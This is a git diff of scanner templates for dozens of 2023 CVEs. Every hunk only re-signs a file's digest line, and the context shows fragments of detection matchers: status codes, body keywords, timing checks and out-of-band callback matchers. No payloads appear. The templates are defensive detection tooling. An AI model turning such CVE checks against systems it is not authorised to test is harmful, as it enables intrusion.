a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f5f6814aa5d06c039624e1388900e0996315533d8c419eefbe2de6caf447910a022100e6c8e5b02653c56e18102d89247b0711570a77ff45625ccf9e7cca81d1ed08b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202ebad3eee21401766cd6d90a74dded43b56efa9cf9b97942cf546a116f18fceb02204cc42560caa90f0647946f365825fa3adaed54fb32df915d1923617404ec7eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index f0520bc1e2..1abcbc5017 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c39406182802fe8b9ffa065f62e7be3e481669903d495a6949fb9b4cf5c3fa8802205791c3506012ccf296d6dae5ddf44dee9f869f2b7eec108a352c0ec94274c48b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066af9a14b5d4b46b5206573d4676499c39fb49182e834c8aabb6598e4d25330c022100fd5577b9bd3944c2d1fc1cfbdcfe4804e18b88ef0296e85bfc8d26d3f62e55bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml index 81c4b9be4c..7b47e031c2 100644 --- a/http/cves/2023/CVE-2023-34993.yaml +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -56,4 +56,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4b0a00483046022100c11dc698621ad5d479ce8b696577f5cefad748f79e912c23b63ec28b8241cab7022100eb380ef3a5801902ee831f7cea179e4e86d8cc93bdeb381d1985e4a367a6b44d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a332f7b02191f50bbdffc0c070e03f669898fd78fd7b47176911f36a6231f5702203ad403ffd2de74ac672ebe4c762a1c1b56bb9ab395485fa85fade4d08e0e046b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 3b6d003cc9..34986e24a9 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -47,4 +47,4 @@ http: - contains(header, 'application/json') - status_code == 200 condition: and -# digest: 4a0a00473045022100fb617461878cbf1cb97fb26512af671a914dc1d115f559de3711731793a4c89e022032c6a861070e3124588eba232d2457156b4686063cac141690eee2f1a9e366c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e81119c0813b00e47072c081343c595b2ef8c5e95ffaf4e9fc5b03ce9e908230022100d72112d6dba2bd24756337b25c2a2dd7eb705c28b42d3674980e42ef40213f91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index fb9b0090bc..08da8bf200 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -47,4 +47,4 @@ http: - contains(header, 'application/json') - status_code == 200 condition: and -# digest: 4a0a00473045022100b4843883fe2485c515a79c00d17ea62c065bd50025c2c4c7a243d434d65daf1802207835fc7e73d18f106d16c31391ba326357df94fc9b3ebbea01335a66535e1f8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206702aa2fa81c73af6527e7787118ebadcf29180430928e3bc14653af8e998871022016579004bf1530a83e0640a0dcab8e5c6abc73598758d064bf917bfc3996d707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index 43b1073e01..0003fea863 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -44,4 +44,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100b0c7423bf18413a0b58744deba1ec262ca414bb3b5f104c43651fd6b38ab44a7022062f98e95a05171d79819833fc2b54e8e47af9df4f77767967d9b6a5283628cbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200d194a8ba0215722eef75f47793612556c309a23957a41c3a7bfc3eef3a42779022100f20a9c24a66611d3e34c021e04f429ab7fe14b13b16990525f579490b6c2605f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35162.yaml b/http/cves/2023/CVE-2023-35162.yaml index 6002a1f4c2..5a195329a1 100644 --- a/http/cves/2023/CVE-2023-35162.yaml +++ b/http/cves/2023/CVE-2023-35162.yaml @@ -46,4 +46,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100c49efcd89e263ea211bc9119c0d6d1eefde0bac768f4f0ccd66179956dd375ca02204917b4bca2a8d825d234c1b1d8eceee9b76ea649133514614bfbde4411028efc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c6e714e3d33b065507816e176e9f2be23252e0b05e84a4f0e6309440dabd0afa0221009ffd025b7bf1d45fb4926720821acd73a98d13982380dbf46ba15d57c33102e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index 150d18603f..aae3c30140 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -58,4 +58,4 @@ http: - contains_all(body, 'commands', 'command', 'value') - status_code == 200 condition: and -# digest: 490a00463044022018d2981931169b4ac76f2bc53373c35e3d41e15fbbd0edc56a74f3c9349996e20220031a4d9fdd2c00078341cf9cc6272c27cddef495be952aa84ef5f5288f981f91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e3153dc84f4ba7e286424b653c26c3bb3b658b1651591ad03ff10e7525b31a7c022100cd5787950a2707a418d57a6f0cfce198a1313f079f8ee54d35cec5bc4f49b57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index d9db823581..a50b1b987c 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a5081df6165056d0a60232314176ee608ab7e86aa51515dacb0184c53b2581c102201d2d5a1485f62e7956ae2a64a91ef95e9840ab920e077c73bf79ff44ac7ea570:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220078c71d90ded5920c359305cf1fc5e017ee9a9e47afb2b5d957ae714438e74160221008de080f01a9ccb2d392f1d76f2a30d50ae71161f67ffdf6d4eaf8ce7792b6e19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 3d7ef28e05..1f37582285 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -79,4 +79,4 @@ http: part: body_5 words: - '{{md5(string)}}' -# digest: 4a0a00473045022100de3df7082a571b36e73fa64a73081349b3fd29a223f127fb5708c1ffb614d48102204dfb2aff3fb0b2d649a29ab7caafb7126fe6de5cbd78e0a753884d0eebedcd38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005bf8c8a3b3b2bec29dd4ba7cd1da445c71437eb9d7b3c226e9b5e4ac7c8eec4022068ee1c986b70232e2fe5f05f26a7e12819b7490f0623339bb63a2cb3ed945bd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index f211cf022d..d513a9391d 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100be3e89c169301c2f96af2d6f398c8af9f377d1975edcd2a2b71eca1f988bc6320220578c949433c1f05c0b03f6a655ca57e5493f25351907897137aa40013864888f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015c8d803dd17aa15d2b5b1fd7082fa9e5137cef412e74f60e9f69a8f170226a70220359f792ecb6d7df6a0bba14872b10f3d32a06043c855bd4c8f2b347eeff46deb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index 62893615c7..4cbd3f2e93 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -58,4 +58,4 @@ http: - duration>=5 - 'contains(body, "Guest Information")' condition: and -# digest: 490a0046304402200f44d3b09198876fbf4b217649455afe606b9cea6230a8f7c292cc156ed077aa02204e0ac7e376ccf8d57157caa5243b1ce6605cc29ba6f89bc4b7c195579eeb6de9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be761ba1c4d35d37f2477043c838509e758b5823b11e9519c50e36a8e9ca07bf022100b0e938bfb91cfacfd6a64d4c5a6004b91a17cb3b28e226db6648e2fe19a9433d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index fea1904d83..fc59f9c301 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -42,4 +42,4 @@ http: part: header words: - "application/vnd.ms-excel" -# digest: 490a0046304402204756644785cf8f6b3401876888de1efa5f00a2e2ce9ffc5e4eacf75cacae41f802200bb338ccebf1d53d196c50f415070a8ad4c488c6dafb66abab734395dd4ca6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f40c2a82acd274bf0a12dd8ee05b0b119d3c8e9af5d8b045f2415c041b1be7810221009dca8bf6565170469423bd5b8781eab18af6d4d0d6ffbb58d4d519cfe3f484f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index 01fe648ce7..458cb57ebe 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022073b755c2e659b0e06ce652bf92d78132a56bea015b5226349c97deda0da9684f02204b07d43c5e8c19c0cf73d9824d1ebbc7e5f51c7a8169cf48e005d02d1a0776d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094213efa04f5b8466007dd26b490b4bea8fdaf4fb671f6c5152ea13ae90c1a10022100b2c8f5ffc5e7eedb018155013f03779d8c3bcac457a65b7e2244c82907991d9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 22dbe5e717..0a8df4eee9 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -56,4 +56,4 @@ http: - type: json json: - .data.content[].path -# digest: 4b0a00483046022100efb567bb46806b832495db880a8d13ebf428236bbe8dd99a8e915d3d0083318c022100b8451f80fc10358d1ab1f2acb9eae70278f042d67f9be136ccdee84a9517bfe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092e7feb36eb07c8db0b80eaa34f7e592db62d2606ea13aee0a454012c8c50ce8022016de26dfbe4663f37ecdbf2ec8db1d12daf769005479d30d009b3c3939eb020c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index 9564b74d53..6093d4aecf 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -56,4 +56,4 @@ http: - type: json json: - .data.content[].path -# digest: 4a0a004730450221008c2a1dc67a28b7eed25ccf947755d6b97c566adf8a533a872f2a591d8c6915dd0220590851b1a68c6ae150b8e44d41cabf453e69386d98d8e71c105c314330be9d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201f84d8f32e5dcfd5e5bf31c8a7fffdb75a137450b41b9a44d6411e3d9bdf4fe102200c4b424ae537a6dd0585fd40eb6551367a80001f4c01ced749ceca8896431f6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index c0d47bcbfb..8756907d78 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210089f80319b143c93e7435f2ec2060f9f63dd6bcc3c5f0876c3c357bf2e5e48243022100d2fe9ab17fc05c6192cbae674f24c8a5ecc5d4396d83bd4d97007aacbe0c8bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6a02e1cb2a3194dba5cb9b523b522159aa9031c4b0e128b25d329b49f0f031a02210080831c24882155c6b883bc9859412b5c757f154ecb5391d371392cd782232093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 04c6803e26..912fd80b4d 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -63,4 +63,4 @@ http: - contains(header_2, "text/html") - status_code_2 == 200 condition: and -# digest: 4a0a004730450220643ea5d25ebd6462175647d0352e654dec11e5bbf97098502cdba54aa2b37b10022100f78b5a0c6736fc0b38d6b15d12a5a19cd77d77a558d46f34e3aed6499cbae411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aca35384b1e0a8638525064c8989b40a375b26322a9780252e1417303626f85e02205ce480fe0365ba3a5aea38fa1a825cde0856de2a2023d287e79e397a41f4121b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index bef31bec2a..8a33866573 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009745433d8fa4b1a3de037ad2643c660e2c41e7c4150f54586807f4bdaf0963d6022051607fcc74bc68a32134c9eec40c7bacab67274ee662e00ef0cfcd80562312c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022048e3c2c16faae78f075fb3316202679a06f3ca15d9e665cf8b6865292449a1200221009e80beed07909007baf52bc9724dcc11c5b3700428afd7875003fa9b6fb5ce67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 20b9eb486b..fd1e978a23 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a68493afeda3a529c805502d554dd09859471f0b6f015d91fc552daf23ecdab02206b1a2148e223a672e1bea3d217a5a72cc442d12cde66b1bd15d9548a6f6b2e55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201910ec22d88633834d3b0e067f4ca52c741436df0af9382e716b0f2231fca6d802204e5c9c7c0e8f552ad62f76fd94a3f8d15d8b7fda116fe58cd0b07669005360ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 3b716b7607..e95420e167 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -76,4 +76,4 @@ http: regex: - '(.*)' internal: true -# digest: 490a004630440220575ada41e067b0063b7ad7058003ec029cfee0ca830bf8c18febb02c0933bfa502201d1566c2a59d49ef5a0289309769e0894ce341b208c868479d9b7a85b588aeed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090fa6ea3074ddefab156454bac75d98ecf2afccb77df469b6769e05ce26989a402201089a4c18eb1d115bde79688a15cbd51dacae795376dc2c19bde505d32158c91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index b695c496a7..583a82abac 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -49,4 +49,4 @@ http: - 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")' - 'contains(body, "")' condition: and -# digest: 4b0a004830460221008a4f14fb887d4162c99d5eda9b4b44f8a1b9026c67fad542d58e4f09e8367985022100c5c3b3af216393ea60cb48060d69ca2138c766ddf29c2d9f47c4017ae54f2ab2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1039a707e093f50dc7ad75f85cd8933914227dbd16cc520cdea48b2fa5173460221009640d40fea17c786d19eb1047f3543f11316fd30a90a101b9177a8c109a751cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index d116fccdef..8dd3132c61 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -54,4 +54,4 @@ http: - contains(interactsh_protocol, 'dns') - status_code == 200 condition: and -# digest: 4a0a00473045022100e0d7db72cf2d3250b9cec6f4809158d7a36e2c52763f0d5bb3d4063ed878f6820220298d902c4967c3ff8d30ccca8aded010c4b182fd6d9af361525c23d6730e4bb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022026cbfee688ff707e0e6ae8f29561501c0afcef82082d08c908b8e472fc2996510220382f1c7435050c40184e851419313a2b2ed4b1a086ba148c9ea2ffa273ffd6c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38203.yaml b/http/cves/2023/CVE-2023-38203.yaml index 0bc00ce249..f56ed775d3 100644 --- a/http/cves/2023/CVE-2023-38203.yaml +++ b/http/cves/2023/CVE-2023-38203.yaml @@ -56,4 +56,4 @@ http: - contains(interactsh_protocol, "dns") - contains(body, "ColdFusion documentation") condition: and -# digest: 4a0a0047304502204b7f0be98221b5f266e90dba3b2252cfbaf63e4ce9f4673e14be3b78cb46ef9d022100910b2d487c59c89de52ae909540e8e890e4dc89dc7240686aa95181c045ee5ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000a2f86e0dc0ac031266f79d23033c2272a377adade2e9030da5fbace145ecf9022078f0527055b2c7d6342cdfbe71c8c27c616fe82f89680ef3a7534f8b9215ea14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index 100cf46124..eb7b306e79 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -57,4 +57,4 @@ http: - status_code == 200 - len(trim_space(body)) == 106 condition: and -# digest: 4a0a00473045022100eccd6573796683e57056fb5dc00be04eb056625acbc7478e5f3c0d4d5f780ddc022001852cd078ce0c1ab64b9afb70fe440f5c3d0b7e64b303e4b7f3e78672ab882c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201f5fd9a02579626ad771cd958b812d81f7437cd219608ff2278a49d19d8b39db022004b6c8ed6549e3ca95af554a4353d5c3c96430d5b7edc2eeba257d5eb387a2e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index f8b24740bd..57e6279975 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -71,4 +71,4 @@ http: part: body_1 regex: - 'ico_res_(\w+)_on\.jsp' -# digest: 490a004630440220710398a4a993d2c9e45d26d85f9c179770dfdd348036bd851f0daca96e1055d9022021d4a672da767d580f3c36cb6b47aa8439cd36951761b993231f735ecd100f8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220606c5846c5be25299de2a61ac01659ecdc2fc59f93bb1fcbb37539019ae3f2a402201b12673926f6779f78f43767a9477ebc411e61312751f4bc04a088b79a22e6d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index c5dfcba420..045eaada97 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008d59a360884361f658aa4ed740d619a553796291f36085ba3a6f6d0d925e8e0f022100d609d48648eade90c15f03f07573bce9aaa52138ff9c38ca80f239a2a0aded03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220339e122342e81795d73baca010a14f5f18ebda3889eb36b5df9ad2052cc451f90220310bcf82220b0bcebf3650c9eed525433112c6c74a38dfdced33aecf17eb6784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml index d5a56fc2fa..b52fb478fb 100644 --- a/http/cves/2023/CVE-2023-3844.yaml +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">r5c3m", "mooDating")' condition: and -# digest: 4a0a00473045022100dbb95798feea3cf7aaba17b4e5abd88edc10d3800e4bcb3e7f11fb62502fd79d02206cb3514a3aef06831a5a7df5e2ffdf89867957a0dee2da8461dd34c830010db4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f69075a464598a34eab0d4fff63de5ca62fdaeadee27ae389cd996c9acf94ad022027d9aa27c168feeaef2be1a802c4093742779dd96d6219ee1ce9f8e6fad52c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index fcf37f3846..db600cfda4 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -45,4 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "","\">go to")' condition: and -# digest: 490a00463044022058675a969abbe4a2b7fa295342715495195d739ef396e23a4a0d438308f7da2602204db3cacf7da7334c43cc5614d12dea9155acca0e5edf872eff3e6c17a315c7ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015232a0b9a376e134d12be8765ea8490b2e4e80d4eeb2ce4eac537bbeecb9d87022100a4641d129669bde580ec4d925aaa2a60e36c23467fc951db62fe9a654113f8ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 01ff2422b2..463c83f735 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -78,4 +78,4 @@ http: - contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException") - status_code_2 == 400 condition: and -# digest: 490a0046304402207913b60da21ca7a9f42e1038bdcef2c37179c41070550c9ba2c1a657b15aeed5022008b3bf5bf870aa43066ff7b66df7cc15b4b52b70e57706a7975de094f182ee9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220430d6b3809d41f95f3490cfd06e099f7baa5b88b22f600e3333d56ac068d9b3502207e61d04694ef23ed0a6d7fec22487a8274ad68b76a2503eb1b785722c6355e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml index c6f181dc4e..b8398091ad 100644 --- a/http/cves/2023/CVE-2023-38964.yaml +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "All courses")' condition: and -# digest: 4b0a00483046022100fc3ef9c3df26b3afecca702e9abd986af4773485c1261f369bb32e2c059bc1040221008fad9bec13f7b3bb22ed5cbddafb19b3d28df6f4bc7d80092da76e900d2525ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e604c0ad2fcb45b147262455b08d0bf158d5cc71cabb5a521fd1cb050c959ff802204279a912eb299e0c11b5b2ab85bcfe0464dad43cda5f4b9ca6fa37f3d49b1be1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index defbe64808..41bd71963b 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -78,4 +78,4 @@ http: regex: - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="' internal: true -# digest: 490a004630440220210b73cd75866a80ef8cf1ef7f0c230ccb8335664a46ca37d236501bb802760a0220455c59c9fdf00b97f3082c658c098ec010d464d80f683693b3d6f3f2b1cb8672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220648e359fb46c1d659f869a9bf80a9531bb4084585421f669e1718e685d5f6e25022100bcc807892e83e45f05bbf62bce39d41ac4e656c6f0d585f294b55a73de06771b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index 1b938916dd..211c8237da 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -46,4 +46,4 @@ http: - "contains(content_type, 'text/plain')" - "status_code == 200" condition: and -# digest: 4b0a004830460221008eef2df71e4ec7a1c95eb0f6c0b02ea05a34fa520204cb86ff7caa631347ed10022100ad957b79ec1db60d79e81321296879187e38884b187b9647ab712761b6ed96fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009395553313e58384aab722806070a0a43add2f31f397edc603d9ddc31c2ddaa802207c5c388fd3f079f0106064a1d8296a16c83f3c09259fe4710bc286dbbc9229a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index 886fec2405..74cbd87913 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -64,4 +64,4 @@ http: part: header_3 status: - 200 -# digest: 4b0a00483046022100b707b4d3b5b7b3c72604ee68acc636ed7c5af48169fef985f1ce76826fab1c870221008de99fb0c60906d5ee1304e323d132dca9b12994a5c1e18a3da00b34603dc9d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210092c250822bc140350abf1d8e73be7b64640b19c53c886108c94028d9c2b752a4022100faf855cae3dcd7b95133fafafb9ed2ff4a7762cd22f475c64b725d1753a256c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index 0ab820a891..cae7409edd 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022036ef8b4f6f889c0ec877ae9a013ad526d94d3149fb8c517c97b9a2a0ba39054f02202c881f4ff35129806cf26c35d0a755001d55e1f6eddd502ee10e56dfcd596aa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8377d9a04b49ba5b8bfde6a545f50fefec795648d643e03f93a06ca69e2161402200d1268c1929891a66e2dc218ad53540c5ec143ad5bbe0658d1b5ec4581194a2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index 214d40a6dc..1de88473d5 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -64,4 +64,4 @@ http: part: header_3 status: - 200 -# digest: 4a0a00473045022100b12af2cf2c76b4847a0c93cda3e5872ecab627071d48a9b4398f5d04ff87342802205f2a3ac8a4d3ce38ffc44a860ef7451a4cef8622976e221429d5478f0b794e2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b995c3bb00f64484c428053660654fa05df0dd9f3c16b04413160b53bed44c2f022100e3592718a2bdf464ebf92342fccd00975a48abf271fcb839116f42d24336ae8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 